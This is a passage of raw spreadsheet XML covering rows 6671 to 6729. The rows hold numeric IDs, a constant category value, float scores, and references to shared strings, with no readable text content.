      <c r="B6671">
        <v>4203</v>
      </c>
      <c r="C6671">
        <v>4203</v>
      </c>
      <c r="D6671">
        <v>3</v>
      </c>
      <c r="E6671">
        <v>0.3562999963760376</v>
      </c>
      <c r="F6671" t="s">
        <v>10120</v>
      </c>
      <c r="G6671" t="s">
        <v>13195</v>
      </c>
      <c r="H6671" t="s">
        <v>13196</v>
      </c>
    </row>
    <row r="6672" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6672" s="1">
        <v>6670</v>
      </c>
      <c r="B6672">
        <v>4202</v>
      </c>
      <c r="C6672">
        <v>4202</v>
      </c>
      <c r="D6672">
        <v>3</v>
      </c>
      <c r="E6672">
        <v>0.47900000214576721</v>
      </c>
      <c r="F6672" t="s">
        <v>10120</v>
      </c>
      <c r="G6672" t="s">
        <v>13197</v>
      </c>
      <c r="H6672" t="s">
        <v>13198</v>
      </c>
    </row>
    <row r="6673" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6673" s="1">
        <v>6671</v>
      </c>
      <c r="B6673">
        <v>5522</v>
      </c>
      <c r="C6673">
        <v>5522</v>
      </c>
      <c r="D6673">
        <v>3</v>
      </c>
      <c r="E6673">
        <v>0.94770002365112305</v>
      </c>
      <c r="F6673" t="s">
        <v>10120</v>
      </c>
      <c r="G6673" t="s">
        <v>13199</v>
      </c>
      <c r="H6673" t="s">
        <v>13200</v>
      </c>
    </row>
    <row r="6674" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6674" s="1">
        <v>6672</v>
      </c>
      <c r="B6674">
        <v>603</v>
      </c>
      <c r="C6674">
        <v>603</v>
      </c>
      <c r="D6674">
        <v>3</v>
      </c>
      <c r="E6674">
        <v>0.45120000839233398</v>
      </c>
      <c r="F6674" t="s">
        <v>10120</v>
      </c>
      <c r="G6674" t="s">
        <v>13201</v>
      </c>
      <c r="H6674" t="s">
        <v>13202</v>
      </c>
    </row>
    <row r="6675" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6675" s="1">
        <v>6673</v>
      </c>
      <c r="B6675">
        <v>607</v>
      </c>
      <c r="C6675">
        <v>607</v>
      </c>
      <c r="D6675">
        <v>3</v>
      </c>
      <c r="E6675">
        <v>0.92390000820159912</v>
      </c>
      <c r="F6675" t="s">
        <v>10120</v>
      </c>
      <c r="G6675" t="s">
        <v>13203</v>
      </c>
      <c r="H6675" t="s">
        <v>13204</v>
      </c>
    </row>
    <row r="6676" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6676" s="1">
        <v>6674</v>
      </c>
      <c r="B6676">
        <v>609</v>
      </c>
      <c r="C6676">
        <v>609</v>
      </c>
      <c r="D6676">
        <v>3</v>
      </c>
      <c r="E6676">
        <v>0.85500001907348633</v>
      </c>
      <c r="F6676" t="s">
        <v>10120</v>
      </c>
      <c r="G6676" t="s">
        <v>13205</v>
      </c>
      <c r="H6676" t="s">
        <v>13206</v>
      </c>
    </row>
    <row r="6677" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6677" s="1">
        <v>6675</v>
      </c>
      <c r="B6677">
        <v>610</v>
      </c>
      <c r="C6677">
        <v>610</v>
      </c>
      <c r="D6677">
        <v>3</v>
      </c>
      <c r="E6677">
        <v>0.55349999666213989</v>
      </c>
      <c r="F6677" t="s">
        <v>10120</v>
      </c>
      <c r="G6677" t="s">
        <v>13207</v>
      </c>
      <c r="H6677" t="s">
        <v>13208</v>
      </c>
    </row>
    <row r="6678" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6678" s="1">
        <v>6676</v>
      </c>
      <c r="B6678">
        <v>611</v>
      </c>
      <c r="C6678">
        <v>611</v>
      </c>
      <c r="D6678">
        <v>3</v>
      </c>
      <c r="E6678">
        <v>0.90329998731613159</v>
      </c>
      <c r="F6678" t="s">
        <v>10120</v>
      </c>
      <c r="G6678" t="s">
        <v>13209</v>
      </c>
      <c r="H6678" t="s">
        <v>13210</v>
      </c>
    </row>
    <row r="6679" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6679" s="1">
        <v>6677</v>
      </c>
      <c r="B6679">
        <v>613</v>
      </c>
      <c r="C6679">
        <v>613</v>
      </c>
      <c r="D6679">
        <v>3</v>
      </c>
      <c r="E6679">
        <v>0.68970000743865967</v>
      </c>
      <c r="F6679" t="s">
        <v>10120</v>
      </c>
      <c r="G6679" t="s">
        <v>13211</v>
      </c>
      <c r="H6679" t="s">
        <v>11609</v>
      </c>
    </row>
    <row r="6680" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6680" s="1">
        <v>6678</v>
      </c>
      <c r="B6680">
        <v>4180</v>
      </c>
      <c r="C6680">
        <v>4180</v>
      </c>
      <c r="D6680">
        <v>3</v>
      </c>
      <c r="E6680">
        <v>0.54360002279281616</v>
      </c>
      <c r="F6680" t="s">
        <v>10120</v>
      </c>
      <c r="G6680" t="s">
        <v>13212</v>
      </c>
      <c r="H6680" t="s">
        <v>13213</v>
      </c>
    </row>
    <row r="6681" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6681" s="1">
        <v>6679</v>
      </c>
      <c r="B6681">
        <v>637</v>
      </c>
      <c r="C6681">
        <v>637</v>
      </c>
      <c r="D6681">
        <v>3</v>
      </c>
      <c r="E6681">
        <v>0.41380000114440918</v>
      </c>
      <c r="F6681" t="s">
        <v>10120</v>
      </c>
      <c r="G6681" t="s">
        <v>13214</v>
      </c>
      <c r="H6681" t="s">
        <v>13215</v>
      </c>
    </row>
    <row r="6682" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6682" s="1">
        <v>6680</v>
      </c>
      <c r="B6682">
        <v>4176</v>
      </c>
      <c r="C6682">
        <v>4176</v>
      </c>
      <c r="D6682">
        <v>3</v>
      </c>
      <c r="E6682">
        <v>0.84490001201629639</v>
      </c>
      <c r="F6682" t="s">
        <v>10120</v>
      </c>
      <c r="G6682" t="s">
        <v>13216</v>
      </c>
      <c r="H6682" t="s">
        <v>13217</v>
      </c>
    </row>
    <row r="6683" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6683" s="1">
        <v>6681</v>
      </c>
      <c r="B6683">
        <v>5462</v>
      </c>
      <c r="C6683">
        <v>5462</v>
      </c>
      <c r="D6683">
        <v>3</v>
      </c>
      <c r="E6683">
        <v>0.98600000143051147</v>
      </c>
      <c r="F6683" t="s">
        <v>10120</v>
      </c>
      <c r="G6683" t="s">
        <v>13218</v>
      </c>
      <c r="H6683" t="s">
        <v>13219</v>
      </c>
    </row>
    <row r="6684" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6684" s="1">
        <v>6682</v>
      </c>
      <c r="B6684">
        <v>28</v>
      </c>
      <c r="C6684">
        <v>28</v>
      </c>
      <c r="D6684">
        <v>3</v>
      </c>
      <c r="E6684">
        <v>0.94150000810623169</v>
      </c>
      <c r="F6684" t="s">
        <v>10120</v>
      </c>
      <c r="G6684" t="s">
        <v>13220</v>
      </c>
      <c r="H6684" t="s">
        <v>13221</v>
      </c>
    </row>
    <row r="6685" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6685" s="1">
        <v>6683</v>
      </c>
      <c r="B6685">
        <v>4061</v>
      </c>
      <c r="C6685">
        <v>4061</v>
      </c>
      <c r="D6685">
        <v>3</v>
      </c>
      <c r="E6685">
        <v>0.96289998292922974</v>
      </c>
      <c r="F6685" t="s">
        <v>10120</v>
      </c>
      <c r="G6685" t="s">
        <v>13222</v>
      </c>
      <c r="H6685" t="s">
        <v>13223</v>
      </c>
    </row>
    <row r="6686" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6686" s="1">
        <v>6684</v>
      </c>
      <c r="B6686">
        <v>4426</v>
      </c>
      <c r="C6686">
        <v>4426</v>
      </c>
      <c r="D6686">
        <v>3</v>
      </c>
      <c r="E6686">
        <v>0.93169999122619629</v>
      </c>
      <c r="F6686" t="s">
        <v>10120</v>
      </c>
      <c r="G6686" t="s">
        <v>13224</v>
      </c>
      <c r="H6686" t="s">
        <v>13225</v>
      </c>
    </row>
    <row r="6687" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6687" s="1">
        <v>6685</v>
      </c>
      <c r="B6687">
        <v>3990</v>
      </c>
      <c r="C6687">
        <v>3990</v>
      </c>
      <c r="D6687">
        <v>3</v>
      </c>
      <c r="E6687">
        <v>0.8475000262260437</v>
      </c>
      <c r="F6687" t="s">
        <v>10120</v>
      </c>
      <c r="G6687" t="s">
        <v>13226</v>
      </c>
      <c r="H6687" t="s">
        <v>13227</v>
      </c>
    </row>
    <row r="6688" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6688" s="1">
        <v>6686</v>
      </c>
      <c r="B6688">
        <v>4422</v>
      </c>
      <c r="C6688">
        <v>4422</v>
      </c>
      <c r="D6688">
        <v>3</v>
      </c>
      <c r="E6688">
        <v>0.82590001821517944</v>
      </c>
      <c r="F6688" t="s">
        <v>10120</v>
      </c>
      <c r="G6688" t="s">
        <v>13228</v>
      </c>
      <c r="H6688" t="s">
        <v>13229</v>
      </c>
    </row>
    <row r="6689" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6689" s="1">
        <v>6687</v>
      </c>
      <c r="B6689">
        <v>4421</v>
      </c>
      <c r="C6689">
        <v>4421</v>
      </c>
      <c r="D6689">
        <v>3</v>
      </c>
      <c r="E6689">
        <v>0.98500001430511475</v>
      </c>
      <c r="F6689" t="s">
        <v>10120</v>
      </c>
      <c r="G6689" t="s">
        <v>13230</v>
      </c>
      <c r="H6689" t="s">
        <v>13231</v>
      </c>
    </row>
    <row r="6690" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6690" s="1">
        <v>6688</v>
      </c>
      <c r="B6690">
        <v>678</v>
      </c>
      <c r="C6690">
        <v>678</v>
      </c>
      <c r="D6690">
        <v>3</v>
      </c>
      <c r="E6690">
        <v>0.99610000848770142</v>
      </c>
      <c r="F6690" t="s">
        <v>10120</v>
      </c>
      <c r="G6690" t="s">
        <v>13232</v>
      </c>
      <c r="H6690" t="s">
        <v>13233</v>
      </c>
    </row>
    <row r="6691" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6691" s="1">
        <v>6689</v>
      </c>
      <c r="B6691">
        <v>4420</v>
      </c>
      <c r="C6691">
        <v>4420</v>
      </c>
      <c r="D6691">
        <v>3</v>
      </c>
      <c r="E6691">
        <v>0.98290002346038818</v>
      </c>
      <c r="F6691" t="s">
        <v>10120</v>
      </c>
      <c r="G6691" t="s">
        <v>13234</v>
      </c>
      <c r="H6691" t="s">
        <v>13235</v>
      </c>
    </row>
    <row r="6692" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6692" s="1">
        <v>6690</v>
      </c>
      <c r="B6692">
        <v>5432</v>
      </c>
      <c r="C6692">
        <v>5432</v>
      </c>
      <c r="D6692">
        <v>3</v>
      </c>
      <c r="E6692">
        <v>0.9976000189781189</v>
      </c>
      <c r="F6692" t="s">
        <v>10120</v>
      </c>
      <c r="G6692" t="s">
        <v>13236</v>
      </c>
      <c r="H6692" t="s">
        <v>13237</v>
      </c>
    </row>
    <row r="6693" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6693" s="1">
        <v>6691</v>
      </c>
      <c r="B6693">
        <v>4000</v>
      </c>
      <c r="C6693">
        <v>4000</v>
      </c>
      <c r="D6693">
        <v>3</v>
      </c>
      <c r="E6693">
        <v>0.72009998559951782</v>
      </c>
      <c r="F6693" t="s">
        <v>10120</v>
      </c>
      <c r="G6693" t="s">
        <v>13238</v>
      </c>
      <c r="H6693" t="s">
        <v>13239</v>
      </c>
    </row>
    <row r="6694" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6694" s="1">
        <v>6692</v>
      </c>
      <c r="B6694">
        <v>4003</v>
      </c>
      <c r="C6694">
        <v>4003</v>
      </c>
      <c r="D6694">
        <v>3</v>
      </c>
      <c r="E6694">
        <v>0.99930000305175781</v>
      </c>
      <c r="F6694" t="s">
        <v>10120</v>
      </c>
      <c r="G6694" t="s">
        <v>13240</v>
      </c>
      <c r="H6694" t="s">
        <v>13241</v>
      </c>
    </row>
    <row r="6695" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6695" s="1">
        <v>6693</v>
      </c>
      <c r="B6695">
        <v>4419</v>
      </c>
      <c r="C6695">
        <v>4419</v>
      </c>
      <c r="D6695">
        <v>3</v>
      </c>
      <c r="E6695">
        <v>0.71909999847412109</v>
      </c>
      <c r="F6695" t="s">
        <v>10120</v>
      </c>
      <c r="G6695" t="s">
        <v>13242</v>
      </c>
      <c r="H6695" t="s">
        <v>13243</v>
      </c>
    </row>
    <row r="6696" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6696" s="1">
        <v>6694</v>
      </c>
      <c r="B6696">
        <v>4004</v>
      </c>
      <c r="C6696">
        <v>4004</v>
      </c>
      <c r="D6696">
        <v>3</v>
      </c>
      <c r="E6696">
        <v>0.70160001516342163</v>
      </c>
      <c r="F6696" t="s">
        <v>10120</v>
      </c>
      <c r="G6696" t="s">
        <v>13244</v>
      </c>
      <c r="H6696" t="s">
        <v>13245</v>
      </c>
    </row>
    <row r="6697" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6697" s="1">
        <v>6695</v>
      </c>
      <c r="B6697">
        <v>4418</v>
      </c>
      <c r="C6697">
        <v>4418</v>
      </c>
      <c r="D6697">
        <v>3</v>
      </c>
      <c r="E6697">
        <v>0.89639997482299805</v>
      </c>
      <c r="F6697" t="s">
        <v>10120</v>
      </c>
      <c r="G6697" t="s">
        <v>13246</v>
      </c>
      <c r="H6697" t="s">
        <v>13247</v>
      </c>
    </row>
    <row r="6698" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6698" s="1">
        <v>6696</v>
      </c>
      <c r="B6698">
        <v>5559</v>
      </c>
      <c r="C6698">
        <v>5559</v>
      </c>
      <c r="D6698">
        <v>3</v>
      </c>
      <c r="E6698">
        <v>0.84640002250671387</v>
      </c>
      <c r="F6698" t="s">
        <v>10120</v>
      </c>
      <c r="G6698" t="s">
        <v>13248</v>
      </c>
      <c r="H6698" t="s">
        <v>13249</v>
      </c>
    </row>
    <row r="6699" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6699" s="1">
        <v>6697</v>
      </c>
      <c r="B6699">
        <v>4009</v>
      </c>
      <c r="C6699">
        <v>4009</v>
      </c>
      <c r="D6699">
        <v>3</v>
      </c>
      <c r="E6699">
        <v>0.50520002841949463</v>
      </c>
      <c r="F6699" t="s">
        <v>10120</v>
      </c>
      <c r="G6699" t="s">
        <v>13250</v>
      </c>
      <c r="H6699" t="s">
        <v>13251</v>
      </c>
    </row>
    <row r="6700" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6700" s="1">
        <v>6698</v>
      </c>
      <c r="B6700">
        <v>4413</v>
      </c>
      <c r="C6700">
        <v>4413</v>
      </c>
      <c r="D6700">
        <v>3</v>
      </c>
      <c r="E6700">
        <v>0.90039998292922974</v>
      </c>
      <c r="F6700" t="s">
        <v>10120</v>
      </c>
      <c r="G6700" t="s">
        <v>13252</v>
      </c>
      <c r="H6700" t="s">
        <v>13253</v>
      </c>
    </row>
    <row r="6701" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6701" s="1">
        <v>6699</v>
      </c>
      <c r="B6701">
        <v>4411</v>
      </c>
      <c r="C6701">
        <v>4411</v>
      </c>
      <c r="D6701">
        <v>3</v>
      </c>
      <c r="E6701">
        <v>0.99639999866485596</v>
      </c>
      <c r="F6701" t="s">
        <v>10120</v>
      </c>
      <c r="G6701" t="s">
        <v>13254</v>
      </c>
      <c r="H6701" t="s">
        <v>13255</v>
      </c>
    </row>
    <row r="6702" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6702" s="1">
        <v>6700</v>
      </c>
      <c r="B6702">
        <v>677</v>
      </c>
      <c r="C6702">
        <v>677</v>
      </c>
      <c r="D6702">
        <v>3</v>
      </c>
      <c r="E6702">
        <v>0.72049999237060547</v>
      </c>
      <c r="F6702" t="s">
        <v>10120</v>
      </c>
      <c r="G6702" t="s">
        <v>13256</v>
      </c>
      <c r="H6702" t="s">
        <v>13257</v>
      </c>
    </row>
    <row r="6703" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6703" s="1">
        <v>6701</v>
      </c>
      <c r="B6703">
        <v>4012</v>
      </c>
      <c r="C6703">
        <v>4012</v>
      </c>
      <c r="D6703">
        <v>3</v>
      </c>
      <c r="E6703">
        <v>0.43149998784065252</v>
      </c>
      <c r="F6703" t="s">
        <v>10120</v>
      </c>
      <c r="G6703" t="s">
        <v>13258</v>
      </c>
      <c r="H6703" t="s">
        <v>13259</v>
      </c>
    </row>
    <row r="6704" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6704" s="1">
        <v>6702</v>
      </c>
      <c r="B6704">
        <v>4024</v>
      </c>
      <c r="C6704">
        <v>4024</v>
      </c>
      <c r="D6704">
        <v>3</v>
      </c>
      <c r="E6704">
        <v>0.54839998483657837</v>
      </c>
      <c r="F6704" t="s">
        <v>10120</v>
      </c>
      <c r="G6704" t="s">
        <v>13260</v>
      </c>
      <c r="H6704" t="s">
        <v>13261</v>
      </c>
    </row>
    <row r="6705" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6705" s="1">
        <v>6703</v>
      </c>
      <c r="B6705">
        <v>4033</v>
      </c>
      <c r="C6705">
        <v>4033</v>
      </c>
      <c r="D6705">
        <v>3</v>
      </c>
      <c r="E6705">
        <v>0.68300002813339233</v>
      </c>
      <c r="F6705" t="s">
        <v>10120</v>
      </c>
      <c r="G6705" t="s">
        <v>13262</v>
      </c>
      <c r="H6705" t="s">
        <v>13263</v>
      </c>
    </row>
    <row r="6706" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6706" s="1">
        <v>6704</v>
      </c>
      <c r="B6706">
        <v>675</v>
      </c>
      <c r="C6706">
        <v>675</v>
      </c>
      <c r="D6706">
        <v>3</v>
      </c>
      <c r="E6706">
        <v>0.93809998035430908</v>
      </c>
      <c r="F6706" t="s">
        <v>10120</v>
      </c>
      <c r="G6706" t="s">
        <v>13264</v>
      </c>
      <c r="H6706" t="s">
        <v>13265</v>
      </c>
    </row>
    <row r="6707" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6707" s="1">
        <v>6705</v>
      </c>
      <c r="B6707">
        <v>674</v>
      </c>
      <c r="C6707">
        <v>674</v>
      </c>
      <c r="D6707">
        <v>3</v>
      </c>
      <c r="E6707">
        <v>0.99839997291564941</v>
      </c>
      <c r="F6707" t="s">
        <v>10120</v>
      </c>
      <c r="G6707" t="s">
        <v>13266</v>
      </c>
      <c r="H6707" t="s">
        <v>13267</v>
      </c>
    </row>
    <row r="6708" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6708" s="1">
        <v>6706</v>
      </c>
      <c r="B6708">
        <v>5436</v>
      </c>
      <c r="C6708">
        <v>5436</v>
      </c>
      <c r="D6708">
        <v>3</v>
      </c>
      <c r="E6708">
        <v>0.99580001831054688</v>
      </c>
      <c r="F6708" t="s">
        <v>10120</v>
      </c>
      <c r="G6708" t="s">
        <v>13268</v>
      </c>
      <c r="H6708" t="s">
        <v>13269</v>
      </c>
    </row>
    <row r="6709" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6709" s="1">
        <v>6707</v>
      </c>
      <c r="B6709">
        <v>42</v>
      </c>
      <c r="C6709">
        <v>42</v>
      </c>
      <c r="D6709">
        <v>3</v>
      </c>
      <c r="E6709">
        <v>0.72269999980926514</v>
      </c>
      <c r="F6709" t="s">
        <v>10120</v>
      </c>
      <c r="G6709" t="s">
        <v>13270</v>
      </c>
      <c r="H6709" t="s">
        <v>13271</v>
      </c>
    </row>
    <row r="6710" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6710" s="1">
        <v>6708</v>
      </c>
      <c r="B6710">
        <v>4395</v>
      </c>
      <c r="C6710">
        <v>4395</v>
      </c>
      <c r="D6710">
        <v>3</v>
      </c>
      <c r="E6710">
        <v>0.87430000305175781</v>
      </c>
      <c r="F6710" t="s">
        <v>10120</v>
      </c>
      <c r="G6710" t="s">
        <v>13272</v>
      </c>
      <c r="H6710" t="s">
        <v>13273</v>
      </c>
    </row>
    <row r="6711" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6711" s="1">
        <v>6709</v>
      </c>
      <c r="B6711">
        <v>4037</v>
      </c>
      <c r="C6711">
        <v>4037</v>
      </c>
      <c r="D6711">
        <v>3</v>
      </c>
      <c r="E6711">
        <v>0.54079997539520264</v>
      </c>
      <c r="F6711" t="s">
        <v>10120</v>
      </c>
      <c r="G6711" t="s">
        <v>13274</v>
      </c>
      <c r="H6711" t="s">
        <v>13275</v>
      </c>
    </row>
    <row r="6712" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6712" s="1">
        <v>6710</v>
      </c>
      <c r="B6712">
        <v>4379</v>
      </c>
      <c r="C6712">
        <v>4379</v>
      </c>
      <c r="D6712">
        <v>3</v>
      </c>
      <c r="E6712">
        <v>0.99470001459121704</v>
      </c>
      <c r="F6712" t="s">
        <v>10120</v>
      </c>
      <c r="G6712" t="s">
        <v>13276</v>
      </c>
      <c r="H6712" t="s">
        <v>13277</v>
      </c>
    </row>
    <row r="6713" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6713" s="1">
        <v>6711</v>
      </c>
      <c r="B6713">
        <v>4376</v>
      </c>
      <c r="C6713">
        <v>4376</v>
      </c>
      <c r="D6713">
        <v>3</v>
      </c>
      <c r="E6713">
        <v>0.99720001220703125</v>
      </c>
      <c r="F6713" t="s">
        <v>10120</v>
      </c>
      <c r="G6713" t="s">
        <v>13278</v>
      </c>
      <c r="H6713" t="s">
        <v>13279</v>
      </c>
    </row>
    <row r="6714" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6714" s="1">
        <v>6712</v>
      </c>
      <c r="B6714">
        <v>31</v>
      </c>
      <c r="C6714">
        <v>31</v>
      </c>
      <c r="D6714">
        <v>3</v>
      </c>
      <c r="E6714">
        <v>0.9968000054359436</v>
      </c>
      <c r="F6714" t="s">
        <v>10120</v>
      </c>
      <c r="G6714" t="s">
        <v>13280</v>
      </c>
      <c r="H6714" t="s">
        <v>13281</v>
      </c>
    </row>
    <row r="6715" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6715" s="1">
        <v>6713</v>
      </c>
      <c r="B6715">
        <v>5562</v>
      </c>
      <c r="C6715">
        <v>5562</v>
      </c>
      <c r="D6715">
        <v>3</v>
      </c>
      <c r="E6715">
        <v>0.5899999737739563</v>
      </c>
      <c r="F6715" t="s">
        <v>10120</v>
      </c>
      <c r="G6715" t="s">
        <v>13282</v>
      </c>
      <c r="H6715" t="s">
        <v>10604</v>
      </c>
    </row>
    <row r="6716" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6716" s="1">
        <v>6714</v>
      </c>
      <c r="B6716">
        <v>5442</v>
      </c>
      <c r="C6716">
        <v>5442</v>
      </c>
      <c r="D6716">
        <v>3</v>
      </c>
      <c r="E6716">
        <v>0.76810002326965332</v>
      </c>
      <c r="F6716" t="s">
        <v>10120</v>
      </c>
      <c r="G6716" t="s">
        <v>13283</v>
      </c>
      <c r="H6716" t="s">
        <v>13284</v>
      </c>
    </row>
    <row r="6717" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6717" s="1">
        <v>6715</v>
      </c>
      <c r="B6717">
        <v>45</v>
      </c>
      <c r="C6717">
        <v>45</v>
      </c>
      <c r="D6717">
        <v>3</v>
      </c>
      <c r="E6717">
        <v>0.86769998073577881</v>
      </c>
      <c r="F6717" t="s">
        <v>10120</v>
      </c>
      <c r="G6717" t="s">
        <v>13285</v>
      </c>
      <c r="H6717" t="s">
        <v>13286</v>
      </c>
    </row>
    <row r="6718" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6718" s="1">
        <v>6716</v>
      </c>
      <c r="B6718">
        <v>4427</v>
      </c>
      <c r="C6718">
        <v>4427</v>
      </c>
      <c r="D6718">
        <v>3</v>
      </c>
      <c r="E6718">
        <v>0.66649997234344482</v>
      </c>
      <c r="F6718" t="s">
        <v>10120</v>
      </c>
      <c r="G6718" t="s">
        <v>13287</v>
      </c>
      <c r="H6718" t="s">
        <v>13288</v>
      </c>
    </row>
    <row r="6719" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6719" s="1">
        <v>6717</v>
      </c>
      <c r="B6719">
        <v>455</v>
      </c>
      <c r="C6719">
        <v>455</v>
      </c>
      <c r="D6719">
        <v>3</v>
      </c>
      <c r="E6719">
        <v>0.83609998226165771</v>
      </c>
      <c r="F6719" t="s">
        <v>10120</v>
      </c>
      <c r="G6719" t="s">
        <v>13289</v>
      </c>
      <c r="H6719" t="s">
        <v>13290</v>
      </c>
    </row>
    <row r="6720" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6720" s="1">
        <v>6718</v>
      </c>
      <c r="B6720">
        <v>4477</v>
      </c>
      <c r="C6720">
        <v>4477</v>
      </c>
      <c r="D6720">
        <v>3</v>
      </c>
      <c r="E6720">
        <v>0.98059999942779541</v>
      </c>
      <c r="F6720" t="s">
        <v>10120</v>
      </c>
      <c r="G6720" t="s">
        <v>13291</v>
      </c>
      <c r="H6720" t="s">
        <v>13292</v>
      </c>
    </row>
    <row r="6721" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6721" s="1">
        <v>6719</v>
      </c>
      <c r="B6721">
        <v>4471</v>
      </c>
      <c r="C6721">
        <v>4471</v>
      </c>
      <c r="D6721">
        <v>3</v>
      </c>
      <c r="E6721">
        <v>0.64990001916885376</v>
      </c>
      <c r="F6721" t="s">
        <v>10120</v>
      </c>
      <c r="G6721" t="s">
        <v>13293</v>
      </c>
      <c r="H6721" t="s">
        <v>13294</v>
      </c>
    </row>
    <row r="6722" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6722" s="1">
        <v>6720</v>
      </c>
      <c r="B6722">
        <v>682</v>
      </c>
      <c r="C6722">
        <v>682</v>
      </c>
      <c r="D6722">
        <v>3</v>
      </c>
      <c r="E6722">
        <v>0.93320000171661377</v>
      </c>
      <c r="F6722" t="s">
        <v>10120</v>
      </c>
      <c r="G6722" t="s">
        <v>13295</v>
      </c>
      <c r="H6722" t="s">
        <v>13296</v>
      </c>
    </row>
    <row r="6723" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6723" s="1">
        <v>6721</v>
      </c>
      <c r="B6723">
        <v>4469</v>
      </c>
      <c r="C6723">
        <v>4469</v>
      </c>
      <c r="D6723">
        <v>3</v>
      </c>
      <c r="E6723">
        <v>0.96710002422332764</v>
      </c>
      <c r="F6723" t="s">
        <v>10120</v>
      </c>
      <c r="G6723" t="s">
        <v>13297</v>
      </c>
      <c r="H6723" t="s">
        <v>13298</v>
      </c>
    </row>
    <row r="6724" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6724" s="1">
        <v>6722</v>
      </c>
      <c r="B6724">
        <v>681</v>
      </c>
      <c r="C6724">
        <v>681</v>
      </c>
      <c r="D6724">
        <v>3</v>
      </c>
      <c r="E6724">
        <v>0.54839998483657837</v>
      </c>
      <c r="F6724" t="s">
        <v>10120</v>
      </c>
      <c r="G6724" t="s">
        <v>13299</v>
      </c>
      <c r="H6724" t="s">
        <v>13300</v>
      </c>
    </row>
    <row r="6725" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6725" s="1">
        <v>6723</v>
      </c>
      <c r="B6725">
        <v>4462</v>
      </c>
      <c r="C6725">
        <v>4462</v>
      </c>
      <c r="D6725">
        <v>3</v>
      </c>
      <c r="E6725">
        <v>0.65630000829696655</v>
      </c>
      <c r="F6725" t="s">
        <v>10120</v>
      </c>
      <c r="G6725" t="s">
        <v>13301</v>
      </c>
      <c r="H6725" t="s">
        <v>13302</v>
      </c>
    </row>
    <row r="6726" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6726" s="1">
        <v>6724</v>
      </c>
      <c r="B6726">
        <v>4461</v>
      </c>
      <c r="C6726">
        <v>4461</v>
      </c>
      <c r="D6726">
        <v>3</v>
      </c>
      <c r="E6726">
        <v>0.65549999475479126</v>
      </c>
      <c r="F6726" t="s">
        <v>10120</v>
      </c>
      <c r="G6726" t="s">
        <v>13303</v>
      </c>
      <c r="H6726" t="s">
        <v>13304</v>
      </c>
    </row>
    <row r="6727" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6727" s="1">
        <v>6725</v>
      </c>
      <c r="B6727">
        <v>4459</v>
      </c>
      <c r="C6727">
        <v>4459</v>
      </c>
      <c r="D6727">
        <v>3</v>
      </c>
      <c r="E6727">
        <v>0.67790001630783081</v>
      </c>
      <c r="F6727" t="s">
        <v>10120</v>
      </c>
      <c r="G6727" t="s">
        <v>13305</v>
      </c>
      <c r="H6727" t="s">
        <v>13306</v>
      </c>
    </row>
    <row r="6728" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6728" s="1">
        <v>6726</v>
      </c>
      <c r="B6728">
        <v>4456</v>
      </c>
      <c r="C6728">
        <v>4456</v>
      </c>
      <c r="D6728">
        <v>3</v>
      </c>
      <c r="E6728">
        <v>0.65880000591278076</v>
      </c>
      <c r="F6728" t="s">
        <v>10120</v>
      </c>
      <c r="G6728" t="s">
        <v>13307</v>
      </c>
      <c r="H6728" t="s">
        <v>13308</v>
      </c>
    </row>
    <row r="6729" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6729" s="1">
        <v>6727</v>
      </c>
      <c r="B6729">
        <v>5414</v>
      </c>
      <c r="C6729">
        <v>5414</v>
      </c>
      <c r="D6729">
        <v>3</v>
      </c>
      <c r="E6729">
        <v>0.46880000829696661</v>
      </c>
      <c r="F6729" t="s">
        <v>10120</v>
